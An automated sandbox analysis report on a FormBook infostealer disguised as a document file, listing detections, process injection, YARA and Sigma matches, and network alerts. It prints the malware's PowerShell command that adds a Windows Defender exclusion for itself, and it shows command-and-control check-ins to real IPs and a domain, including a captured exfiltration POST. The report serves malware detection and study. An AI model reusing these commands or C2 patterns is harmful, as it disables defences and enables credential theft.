Windows Analysis Report
PASU5160894680 DOCS.scr.exe

Overview

General Information

Sample name: PASU5160894680 DOCS.scr.exe
Analysis ID: 1510085
MD5: 6e3e35e593690a43c0fabe9ec9367b67
SHA1: 8f9ed06b7b4d0d3c9b4f34ec66919482abacb7f4
SHA256: 6cc54bd57057a1fc07c2726c351a42f47caef4ae05a2693fbf6b9f693c6761c6
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • PASU5160894680 DOCS.scr.exe (PID: 7336 cmdline: "C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe" MD5: 6E3E35E593690A43C0FABE9EC9367B67)
    • powershell.exe (PID: 7520 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • vbc.exe (PID: 7544 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" MD5: 0A7608DB01CAE07792CEA95E792AA866)
      • uFLByAWAOFbhtV.exe (PID: 2496 cmdline: "C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • control.exe (PID: 7792 cmdline: "C:\Windows\SysWOW64\control.exe" MD5: EBC29AA32C57A54018089CFC9CACAFE8)
          • uFLByAWAOFbhtV.exe (PID: 5084 cmdline: "C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8128 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
PASU5160894680 DOCS.scr.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security

Source | Rule | Description | Author | Strings
00000004.00000002.1846379339.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000004.00000002.1846379339.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2ed23:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16f62:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.4133191097.0000000004910000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000006.00000002.4133191097.0000000004910000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2bc30:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13e6f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.4132211926.0000000000C50000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security

Source | Rule | Description | Author | Strings
4.2.vbc.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
4.2.vbc.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2ed23:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16f62:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
4.2.vbc.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
4.2.vbc.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2df23:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16162:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0.0.PASU5160894680 DOCS.scr.exe.f00000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security

                System Summary

                Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe", ParentImage: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe, ParentProcessId: 7336, ParentProcessName: PASU5160894680 DOCS.scr.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe", ProcessId: 7520, ProcessName: powershell.exe
                Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe", ParentImage: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe, ParentProcessId: 7336, ParentProcessName: PASU5160894680 DOCS.scr.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe", ProcessId: 7520, ProcessName: powershell.exe

                AV Detection

                Source: PASU5160894680 DOCS.scr.exe, Avira: detected
                Source: PASU5160894680 DOCS.scr.exe, ReversingLabs: Detection: 31%
                Source: Yara match, File source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000004.00000002.1846379339.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000006.00000002.4133191097.0000000004910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000006.00000002.4132211926.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000006.00000002.4133252340.0000000004960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000004.00000002.1846811096.0000000004D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000004.00000002.1848370775.0000000006CF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
                Source: PASU5160894680 DOCS.scr.exe, Joe Sandbox ML: detected
                Source: PASU5160894680 DOCS.scr.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: PASU5160894680 DOCS.scr.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: Unexpected node type! Please add aupport for any new parse tree nodes to the AutoParseTreeVisitor class!VB$AnonymousDelegateVB$StateMachinemscorpe.dllCreateICeeFileGenCreateICeeFileGenDestroyICeeFileGenDestroyICeeFileGen%ld.Myalink.dllCreateALinkCreateALinkComImport_VtblGap As Integer.pdbCLSID_CorSymWriter&%s.sdatavector<T> too longS?~ source: control.exe, 00000006.00000002.4134255300.000000000541C000.00000004.10000000.00040000.00000000.sdmp, control.exe, 00000006.00000002.4133923961.0000000004EB7000.00000004.00000020.00020000.00000000.sdmp, uFLByAWAOFbhtV.exe, 0000000A.00000000.1915538876.000000000344C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2136958626.00000000089CC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: uFLByAWAOFbhtV.exe, 00000005.00000000.1766652300.0000000000BDE000.00000002.00000001.01000000.0000000C.sdmp, uFLByAWAOFbhtV.exe, 0000000A.00000002.4132210801.0000000000BDE000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: control.pdb source: vbc.exe, 00000004.00000002.1846972436.0000000005148000.00000004.00000020.00020000.00000000.sdmp, uFLByAWAOFbhtV.exe, 00000005.00000002.4132695833.0000000000728000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: vbc.exe, 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000006.00000003.1849604630.00000000049AD000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000006.00000003.1847230408.00000000047F3000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, control.exe, control.exe, 00000006.00000003.1849604630.00000000049AD000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000006.00000003.1847230408.00000000047F3000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: vbc.pdb source: control.exe, 00000006.00000002.4134255300.000000000541C000.00000004.10000000.00040000.00000000.sdmp, control.exe, 00000006.00000002.4133923961.0000000004EB7000.00000004.00000020.00020000.00000000.sdmp, uFLByAWAOFbhtV.exe, 0000000A.00000000.1915538876.000000000344C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2136958626.00000000089CC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: control.pdbUGP source: vbc.exe, 00000004.00000002.1846972436.0000000005148000.00000004.00000020.00020000.00000000.sdmp, uFLByAWAOFbhtV.exe, 00000005.00000002.4132695833.0000000000728000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\control.exe, Code function: 6_2_00C6C1D0 FindFirstFileW,FindNextFileW,FindClose
                Source: C:\Windows\SysWOW64\control.exe, Code function: 4x nop then xor eax, eax (6_2_00C59A60)
                Source: C:\Windows\SysWOW64\control.exe, Code function: 4x nop then pop edi (6_2_00C5DE30)
                Source: C:\Windows\SysWOW64\control.exe, Code function: 4x nop then mov ebx, 00000004h (6_2_04A604DE)

                Networking

                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49741 -> 43.135.99.21:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49755 -> 203.161.43.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49743 -> 79.125.89.83:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49748 -> 160.251.148.115:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49749 -> 160.251.148.115:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49742 -> 79.125.89.83:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49781 -> 76.223.113.161:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49784 -> 84.32.84.37:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49760 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49750 -> 160.251.148.115:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49745 -> 79.125.89.83:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49766 -> 185.199.108.153:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49782 -> 76.223.113.161:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49754 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49776 -> 45.113.201.77:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49769 -> 91.184.0.200:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49768 -> 91.184.0.200:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49747 -> 160.251.148.115:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49786 -> 84.32.84.37:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49772 -> 154.23.176.197:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49764 -> 185.199.108.153:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49775 -> 45.113.201.77:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49767 -> 91.184.0.200:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49780 -> 76.223.113.161:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49757 -> 203.161.43.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49753 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49763 -> 185.199.108.153:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49756 -> 203.161.43.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49744 -> 79.125.89.83:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49759 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49783 -> 84.32.84.37:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49787 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49771 -> 154.23.176.197:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49765 -> 185.199.108.153:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49778 -> 45.113.201.77:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49751 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49762 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49752 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49758 -> 203.161.43.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49789 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49770 -> 91.184.0.200:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49774 -> 154.23.176.197:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49785 -> 84.32.84.37:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49788 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49761 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49773 -> 154.23.176.197:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49777 -> 45.113.201.77:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49779 -> 76.223.113.161:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49790 -> 3.33.130.190:80
                Source: DNS query: www.academy-training.xyz
                Source: Yara match, File source: PASU5160894680 DOCS.scr.exe, type: SAMPLE
                Source: Yara match, File source: 0.0.PASU5160894680 DOCS.scr.exe.f00000.0.unpack, type: UNPACKEDPE
                Source: Joe Sandbox View, IP Address: 203.161.43.228
                Source: Joe Sandbox View, IP Address: 160.251.148.115
                Source: Joe Sandbox View, ASN Name: LILLY-ASUS
                Source: Joe Sandbox View, ASN Name: VNPT-AS-VNVNPTCorpVN
                Source: Joe Sandbox View, ASN Name: INTERQGMOInternetIncJP
                Source: Joe Sandbox View, ASN Name: HOSTNETNL
                Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownHTTP traffic detected: POST /1ki5/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brCache-Control: no-cacheContent-Length: 200Content-Type: application/x-www-form-urlencodedConnection: closeHost: www.academy-training.xyzOrigin: http://www.academy-training.xyzReferer: http://www.academy-training.xyz/1ki5/User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like GeckoData Raw: 33 74 56 3d 74 75 71 4b 32 56 7a 6e 4c 78 51 54 4d 71 59 32 43 35 4a 6b 56 66 6c 68 54 4c 51 70 7a 48 46 46 4a 4d 30 73 63 41 73 77 38 67 56 6a 75 42 68 44 78 41 76 49 44 45 2b 37 52 51 36 67 66 4f 58 41 70 59 53 38 72 59 72 49 74 6c 6d 33 41 6e 38 62 77 71 42 46 4a 79 34 35 34 46 43 5a 58 41 4c 77 35 67 71 64 5a 46 55 79 54 77 70 2f 4e 73 35 32 61 45 75 44 41 6b 53 59 74 30 53 66 72 66 77 58 61 63 6b 56 52 58 71 41 48 71 69 79 76 54 6a 65 4e 39 67 37 31 2b 32 7a 50 33 4d 67 71 6a 4e 44 44 34 6b 51 68 69 66 38 56 4b 32 6d 32 5a 36 71 44 2f 4e 66 57 32 52 35 65 36 65 6d 79 30 79 65 34 67 3d 3d Data Ascii: 3tV=tuqK2VznLxQTMqY2C5JkVflhTLQpzHFFJM0scAsw8gVjuBhDxAvIDE+7RQ6gfOXApYS8rYrItlm3An8bwqBFJy454FCZXALw5gqdZFUyTwp/Ns52aEuDAkSYt0SfrfwXackVRXqAHqiyvTjeN9g71+2zP3MgqjNDD4kQhif8VK2m2Z6qD/NfW2R5e6emy0ye4g==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 12 Sep 2024 13:05:31 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 12 Sep 2024 13:05:47 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeServer: nginxX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffStrict-Transport-Security: max-age=63072000; includeSubDomainsContent-Encoding: gzipData Raw: 39 65 0d 0a 1f 8b 08 00 00 00 00 00 04 03 3d 8e cd 0a c2 30 10 84 ef 7d 8a a1 97 de 0c 0a 5e 24 e6 22 f6 e6 45 7d 81 90 ac 6d a8 64 eb 6e aa f8 f6 56 91 ce 6d 7e 3e 18 db 6f dc 29 a9 a6 dc 81 05 29 07 16 a1 50 70 b8 9c 5b 04 e6 21 11 ca 7b a4 95 35 f3 b4 b2 23 c2 dd ab ee 6b 12 61 a9 5d 85 59 56 8b 70 ee dc f1 9b ed 60 cd df ff ca 6b 4f 10 7a 4c a4 85 22 7c 8c 42 aa 0b d2 98 f5 90 b6 a6 59 18 bc bc 22 73 c1 8d a7 1c c1 19 a5 4f 0a 25 79 92 cc 2f 46 57 7d 00 ce cb 33 48 b5 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 9e=0}^$"E}mdnVm~>o))Pp[!{5#ka]YVp`kOzL"|BY"sO%y/FW}3H0
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 12 Sep 2024 13:05:47 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeServer: nginxX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffStrict-Transport-Security: max-age=63072000; includeSubDomainsContent-Encoding: gzipData Raw: 39 65 0d 0a 1f 8b 08 00 00 00 00 00 04 03 3d 8e cd 0a c2 30 10 84 ef 7d 8a a1 97 de 0c 0a 5e 24 e6 22 f6 e6 45 7d 81 90 ac 6d a8 64 eb 6e aa f8 f6 56 91 ce 6d 7e 3e 18 db 6f dc 29 a9 a6 dc 81 05 29 07 16 a1 50 70 b8 9c 5b 04 e6 21 11 ca 7b a4 95 35 f3 b4 b2 23 c2 dd ab ee 6b 12 61 a9 5d 85 59 56 8b 70 ee dc f1 9b ed 60 cd df ff ca 6b 4f 10 7a 4c a4 85 22 7c 8c 42 aa 0b d2 98 f5 90 b6 a6 59 18 bc bc 22 73 c1 8d a7 1c c1 19 a5 4f 0a 25 79 92 cc 2f 46 57 7d 00 ce cb 33 48 b5 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 9e=0}^$"E}mdnVm~>o))Pp[!{5#ka]YVp`kOzL"|BY"sO%y/FW}3H0
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 12 Sep 2024 13:05:49 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeServer: nginxX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffStrict-Transport-Security: max-age=63072000; includeSubDomainsContent-Encoding: gzipData Raw: 39 65 0d 0a 1f 8b 08 00 00 00 00 00 04 03 3d 8e cd 0a c2 30 10 84 ef 7d 8a a1 97 de 0c 0a 5e 24 e6 22 f6 e6 45 7d 81 90 ac 6d a8 64 eb 6e aa f8 f6 56 91 ce 6d 7e 3e 18 db 6f dc 29 a9 a6 dc 81 05 29 07 16 a1 50 70 b8 9c 5b 04 e6 21 11 ca 7b a4 95 35 f3 b4 b2 23 c2 dd ab ee 6b 12 61 a9 5d 85 59 56 8b 70 ee dc f1 9b ed 60 cd df ff ca 6b 4f 10 7a 4c a4 85 22 7c 8c 42 aa 0b d2 98 f5 90 b6 a6 59 18 bc bc 22 73 c1 8d a7 1c c1 19 a5 4f 0a 25 79 92 cc 2f 46 57 7d 00 ce cb 33 48 b5 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 9e=0}^$"E}mdnVm~>o))Pp[!{5#ka]YVp`kOzL"|BY"sO%y/FW}3H0
